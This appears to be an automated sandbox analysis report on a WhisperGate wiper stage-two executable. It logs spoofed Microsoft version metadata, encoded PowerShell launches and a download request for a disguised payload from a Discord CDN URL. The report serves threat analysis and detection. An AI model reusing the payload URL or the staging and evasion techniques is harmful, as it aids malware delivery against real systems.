                                                      RT_ICON0x82500x1d4fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                      RT_ICON0x9fa00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                      RT_ICON0x1a7c80x94a8data
                                                      RT_ICON0x23c700x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4043309055, next used block 4294967047
                                                      RT_ICON0x27e980x25a8data
                                                      RT_ICON0x2a4400x10a8data
                                                      RT_ICON0x2b4e80x468GLS_BINARY_LSB_FIRST
                                                      RT_GROUP_ICON0x2b9500x68data
                                                      RT_VERSION0x2b9b80x3f4data
                                                      RT_MANIFEST0x2bdac0x36aXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyright . .
                                                      Assembly Version10.0.18362.1500
                                                      InternalNameTbopbh.exe
                                                      FileVersion10.0.18362.1500
                                                      CompanyNameMicrosoft Corporation
                                                      LegalTrademarks
                                                      Comments
                                                      ProductName Microsoft Windows
                                                      ProductVersion10.0.18362.1500
                                                      FileDescription
                                                      OriginalFilenameTbopbh.exe

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 17, 2022 02:25:23.920696974 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:23.920753956 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:23.920846939 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:23.977926016 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:23.977962017 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.031980991 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.032147884 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.036612034 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.036638021 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.036952019 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.083822966 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.284538031 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.326009989 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.443249941 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.443366051 CET44349752162.159.130.233192.168.2.3
                                                      Jan 17, 2022 02:25:24.443631887 CET49752443192.168.2.3162.159.130.233
                                                      Jan 17, 2022 02:25:24.450921059 CET49752443192.168.2.3162.159.130.233

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 17, 2022 02:25:23.882636070 CET4957253192.168.2.38.8.8.8
                                                      Jan 17, 2022 02:25:23.905548096 CET53495728.8.8.8192.168.2.3

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jan 17, 2022 02:25:23.882636070 CET192.168.2.38.8.8.80xa202Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      Jan 17, 2022 02:25:23.905548096 CET8.8.8.8192.168.2.30xa202No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349752162.159.130.233443C:\Users\user\Desktop\stage2.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-01-17 01:25:24 UTC0OUTGET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2022-01-17 01:25:24 UTC0INHTTP/1.1 403 Forbidden
                                                      Date: Mon, 17 Jan 2022 01:25:24 GMT
                                                      Content-Type: application/xml; charset=UTF-8
                                                      Content-Length: 223
                                                      Connection: close
                                                      CF-Ray: 6cebca1adc534a68-FRA
                                                      Cache-Control: private, max-age=0
                                                      Expires: Mon, 17 Jan 2022 01:25:24 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: MISS
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      2022-01-17 01:25:24 UTC1INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                      Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: stage2.exe PID: 7084 Parent PID: 6084

                                                      General

                                                      Start time:02:24:07
                                                      Start date:17/01/2022
                                                      Path:C:\Users\user\Desktop\stage2.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\stage2.exe"
                                                      Imagebase:0xea0000
                                                      File size:214944 bytes
                                                      MD5 hash:14C8482F302B5E81E3FA1B18A509289D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      • Rule: APT_HKTL_Wiper_WhisperGate_Jan22_2, Description: Detects unknown wiper malware, Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, Author: Florian Roth
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 7160 Parent PID: 7084

                                                      General

                                                      Start time:02:24:08
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
                                                      Imagebase:0x13a0000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6176 Parent PID: 7160

                                                      General

                                                      Start time:02:24:08
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7f20f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 7140 Parent PID: 7084

                                                      General

                                                      Start time:02:24:44
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
                                                      Imagebase:0x13a0000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6424 Parent PID: 7140

                                                      General

                                                      Start time:02:24:44
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7f20f0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: WerFault.exe PID: 492 Parent PID: 7084

                                                      General

                                                      Start time:02:25:27
                                                      Start date:17/01/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
                                                      Imagebase:0x10a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: powershell.exe PID: 7160 Parent PID: 7084 powershell.exeCOMMON

                                                        Execution Graph

                                                        Execution Coverage:6%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:58
                                                        Total number of Limit Nodes:4

                                                        Graph

                                                        execution_graph 34256 7eaf888 34262 7eaf29c 34256->34262 34258 7eaf8bd 34260 7eaf984 CreateFileW 34261 7eaf9c1 34260->34261 34263 7eaf930 CreateFileW 34262->34263 34265 7eaf8a7 34263->34265 34265->34258 34265->34260 34266 4a61c90 34267 4a61c92 34266->34267 34271 4a64288 34267->34271 34277 4a64278 34267->34277 34268 4a61cd1 34272 4a64292 34271->34272 34273 4a642b7 34272->34273 34283 4a64340 34272->34283 34288 4a643a8 34272->34288 34299 4a64331 34272->34299 34273->34268 34278 4a6427c 34277->34278 34279 4a642b7 34278->34279 34280 4a64340 GetFileAttributesW 34278->34280 34281 4a64331 GetFileAttributesW 34278->34281 34282 4a643a8 GetFileAttributesW 34278->34282 34279->34268 34280->34279 34281->34279 34282->34279 34284 4a64353 34283->34284 34285 4a64371 34284->34285 34286 4a643a8 GetFileAttributesW 34284->34286 34304 4a643b8 34284->34304 34285->34273 34286->34285 34289 4a643ac 34288->34289 34290 4a64363 34289->34290 34293 4a643b6 34289->34293 34295 4a643a8 GetFileAttributesW 34290->34295 34296 4a643b8 GetFileAttributesW 34290->34296 34291 4a644d3 34291->34273 34292 4a64371 34292->34273 34293->34291 34298 4a64948 GetFileAttributesW 34293->34298 34294 4a64492 34294->34291 34297 4a64948 GetFileAttributesW 34294->34297 34295->34292 34296->34292 34297->34291 34298->34294 34300 4a64334 34299->34300 34301 4a64371 34300->34301 34302 4a643a8 GetFileAttributesW 34300->34302 34303 4a643b8 GetFileAttributesW 34300->34303 34301->34273 34302->34301 34303->34301 34306 4a643ba 34304->34306 34305 4a644d3 34305->34285 34306->34305 34310 4a64948 34306->34310 34307 4a64492 34307->34305 34308 4a64948 GetFileAttributesW 34307->34308 34308->34305 34312 4a6494c 34310->34312 34311 4a64978 34311->34307 34312->34311 34314 4a649a6 34312->34314 34318 4a64948 GetFileAttributesW 34312->34318 34319 4a649a8 34312->34319 34313 4a649d5 34313->34307 34314->34313 34324 4a63f9c 34314->34324 34318->34312 34320 4a649ae 34319->34320 34321 4a649d5 34320->34321 34322 4a63f9c GetFileAttributesW 34320->34322 34321->34312 34323 4a64a06 34322->34323 34323->34312 34326 4a64df0 GetFileAttributesW 34324->34326 34327 4a64a06 34326->34327 34327->34307

                                                        Executed Functions

                                                        Function 07EA7E00, Relevance: .7, Instructions: 688COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.348036989.0000000007EA0000.00000040.00000001.sdmp, Offset: 07EA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ea0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99deacf14a6764af48cd4d771c10455bd929c4c3e3558cf5908f9a12f142a598
                                                        • Instruction ID: 2f0f97a9ee3cc8fa0f55601b9a1b6b63875fc145116200efa35f969f6918aa95
                                                        • Opcode Fuzzy Hash: 99deacf14a6764af48cd4d771c10455bd929c4c3e3558cf5908f9a12f142a598
                                                        • Instruction Fuzzy Hash: 68526BB0601219DFDB25DF64C850BEE73F2EF89308F1085A9D909AB390DB75AD85CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A6CB10, Relevance: .2, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340699591.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e6d29064b122ef45cb379cabdc67a1ad2496caa2541d0abeda9a0112aeb3dbc
                                                        • Instruction ID: 775dd78a9d22f457f185f80f8acce283247538a4fa56cc54df77c898810fe5f9
                                                        • Opcode Fuzzy Hash: 2e6d29064b122ef45cb379cabdc67a1ad2496caa2541d0abeda9a0112aeb3dbc
                                                        • Instruction Fuzzy Hash: 12A16C30600601CFE719DF25C458BAEBBF2BF88318F148569D4569B7A1DB78EC85CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07EAF888, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 173 7eaf888-7eaf8bb call 7eaf29c 177 7eaf8bd-7eaf8e5 173->177 178 7eaf8e6-7eaf97c 173->178 187 7eaf97e-7eaf981 178->187 188 7eaf984-7eaf9bf CreateFileW 178->188 187->188 189 7eaf9c8-7eaf9e5 188->189 190 7eaf9c1-7eaf9c7 188->190 190->189
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.348036989.0000000007EA0000.00000040.00000001.sdmp, Offset: 07EA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ea0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d999962900493bdc2d1a36a8f89c0930861743759f0e0a3de5ec9e8fc72353c7
                                                        • Instruction ID: a796f3b780d0f1933009443d79967816439dcd9a3e7331e8f4e1fea5d96976d2
                                                        • Opcode Fuzzy Hash: d999962900493bdc2d1a36a8f89c0930861743759f0e0a3de5ec9e8fc72353c7
                                                        • Instruction Fuzzy Hash: F641B0B1A00219AFDB10CFA9D845BDEFBF9FB48314F14852AE504AB380D774A840CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07EAF29C, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 193 7eaf29c-7eaf97c 196 7eaf97e-7eaf981 193->196 197 7eaf984-7eaf9bf CreateFileW 193->197 196->197 198 7eaf9c8-7eaf9e5 197->198 199 7eaf9c1-7eaf9c7 197->199 199->198
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07EAF8A7,00000000,00000000,00000003,00000000,00000002), ref: 07EAF9B2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.348036989.0000000007EA0000.00000040.00000001.sdmp, Offset: 07EA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ea0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0e9618b7890e47eb501cd1728c36252308c2c02a070232707424ea774bdd7217
                                                        • Instruction ID: 98a397c4e1d34ce1cf64da2e5da71b58329e6aee30e8a1dc45467c197055ff95
                                                        • Opcode Fuzzy Hash: 0e9618b7890e47eb501cd1728c36252308c2c02a070232707424ea774bdd7217
                                                        • Instruction Fuzzy Hash: E82143B590061AAFCF10CFD9D844ADEFBB8FB08314F00852AE918A7200C774A954CFE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A64DE8, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 202 4a64de8-4a64dea 203 4a64df2-4a64e3a 202->203 204 4a64dec-4a64df1 202->204 207 4a64e42-4a64e6d GetFileAttributesW 203->207 208 4a64e3c-4a64e3f 203->208 204->203 209 4a64e76-4a64e93 207->209 210 4a64e6f-4a64e75 207->210 208->207 210->209
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 04A64E60
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340699591.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 4939dd282d51c970d28db45c2b2d00e1ad240f197a2a47444dca8b9adafc4191
                                                        • Instruction ID: 40b6d2f3dc1372d8aea09eddc181b242485be83f83e071376f9c8ab6ce4be5c8
                                                        • Opcode Fuzzy Hash: 4939dd282d51c970d28db45c2b2d00e1ad240f197a2a47444dca8b9adafc4191
                                                        • Instruction Fuzzy Hash: 332113B5C006199BCB10CFAAD844BDEFBF8FB48724F10862AD919A3240D734A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A63F9C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 213 4a63f9c-4a64e3a 217 4a64e42-4a64e6d GetFileAttributesW 213->217 218 4a64e3c-4a64e3f 213->218 219 4a64e76-4a64e93 217->219 220 4a64e6f-4a64e75 217->220 218->217 220->219
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 04A64E60
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340699591.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 8f52c01b718241794dda531841817de45682242ffe39004e9e80898efa116d55
                                                        • Instruction ID: 3410ab4ec75635ac5f181ad5e876c9cc5e59f7132f152f7815050f1a06d97b45
                                                        • Opcode Fuzzy Hash: 8f52c01b718241794dda531841817de45682242ffe39004e9e80898efa116d55
                                                        • Instruction Fuzzy Hash: 5E2144B0D006199BCB10CFAAD4447DEFBF4FB48720F10812AD919B3240D734A900CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7F8F8, Relevance: .3, Instructions: 293COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf3a4ec1528ef2b95e9653fdcaeb106062477f46f04eef4aa59947a988d029bc
                                                        • Instruction ID: 68b0a58e2a1d5aed474db1490e5da31bde848cdd080f40b4808bf8b3fd88d8db
                                                        • Opcode Fuzzy Hash: bf3a4ec1528ef2b95e9653fdcaeb106062477f46f04eef4aa59947a988d029bc
                                                        • Instruction Fuzzy Hash: 63A130753012005FDB249BB89458BAA3BEAEFC8318F14896DD94ACB381DF34DC46C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7B632, Relevance: .2, Instructions: 240COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b00da9b6d9c66d41787e728469072226fd98c5dcf976d2b9f21e123f546d4430
                                                        • Instruction ID: a93fae4978836fc0f363c50e6934b3a8848901109ae374e80b2bd550dd6f8a37
                                                        • Opcode Fuzzy Hash: b00da9b6d9c66d41787e728469072226fd98c5dcf976d2b9f21e123f546d4430
                                                        • Instruction Fuzzy Hash: 56B1E3B5A01219CFCB14DFA8C494A9DBBF2BF88304F148569E909AB365DB70AD41CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7C080, Relevance: .2, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0afcf4041d9581a012037a680ed15f208191cedbe52d3edec102d94b4355c4b8
                                                        • Instruction ID: fd16de03f469a74facd8bc726c72d416f2c2941896ae1120775c86f6fdc837b6
                                                        • Opcode Fuzzy Hash: 0afcf4041d9581a012037a680ed15f208191cedbe52d3edec102d94b4355c4b8
                                                        • Instruction Fuzzy Hash: 8C719174A012059FDB149FA8D8547AE7BFAEFC8304F148929E505DB3A0DF75AC41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7FC90, Relevance: .2, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c158c61a8446e155e3965cf53de69bc2cf7163a2d50c185d4ca445f8d72fb330
                                                        • Instruction ID: 8ea48750b0f60c029c9380a4dc42913d7ca3bf69881c5416857a4c03a5ed4ce0
                                                        • Opcode Fuzzy Hash: c158c61a8446e155e3965cf53de69bc2cf7163a2d50c185d4ca445f8d72fb330
                                                        • Instruction Fuzzy Hash: CB7133B1B052158FCB159F2CD4906AEFBE6EF89314F14856AD885DB341DB70DC82CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7D077, Relevance: .2, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e12c61f3282cb96000612fb2a75d578add25b60a3ced93f305e0b8182864eb09
                                                        • Instruction ID: ba387d0ea0b5e09b4bcdcbdefed875ad6e50e972f4c21045084fb03c6231c62e
                                                        • Opcode Fuzzy Hash: e12c61f3282cb96000612fb2a75d578add25b60a3ced93f305e0b8182864eb09
                                                        • Instruction Fuzzy Hash: 43911474A01214DFDB28EF34D994B9DB7B2EF88205F5084ADD50AAB351DB35AD81CF21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7C072, Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a55500bfe265fa91164fe76e4e8ca883cb0710b3529b9e68d7c32b3f74901d4
                                                        • Instruction ID: 2620e6ce7162822f7f71887a4e9f19a1d5c67d5ba3b443d5a11c4a6a71ab23e3
                                                        • Opcode Fuzzy Hash: 5a55500bfe265fa91164fe76e4e8ca883cb0710b3529b9e68d7c32b3f74901d4
                                                        • Instruction Fuzzy Hash: 91519175A01205EFCB14DFA8D844B9DBBF6FF88314F148529E415AB2A0DB759C45CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07E7BE71, Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04257319c8d5c172e3ac6e2ef866e21f351268523435dad17b48d7344c56dee9
                                                        • Instruction ID: cf05fd1f13aa0d06e6f81c76240096a173a39395c3481cf3b21453a80a0be4a8
                                                        • Opcode Fuzzy Hash: 04257319c8d5c172e3ac6e2ef866e21f351268523435dad17b48d7344c56dee9
                                                        • Instruction Fuzzy Hash: 831170B46052458FCB14CF58C890AAEF771FF44324F25869AD525DB3E2C736AC82CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048DD01D, Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340185194.00000000048DD000.00000040.00000001.sdmp, Offset: 048DD000, based on PE: false
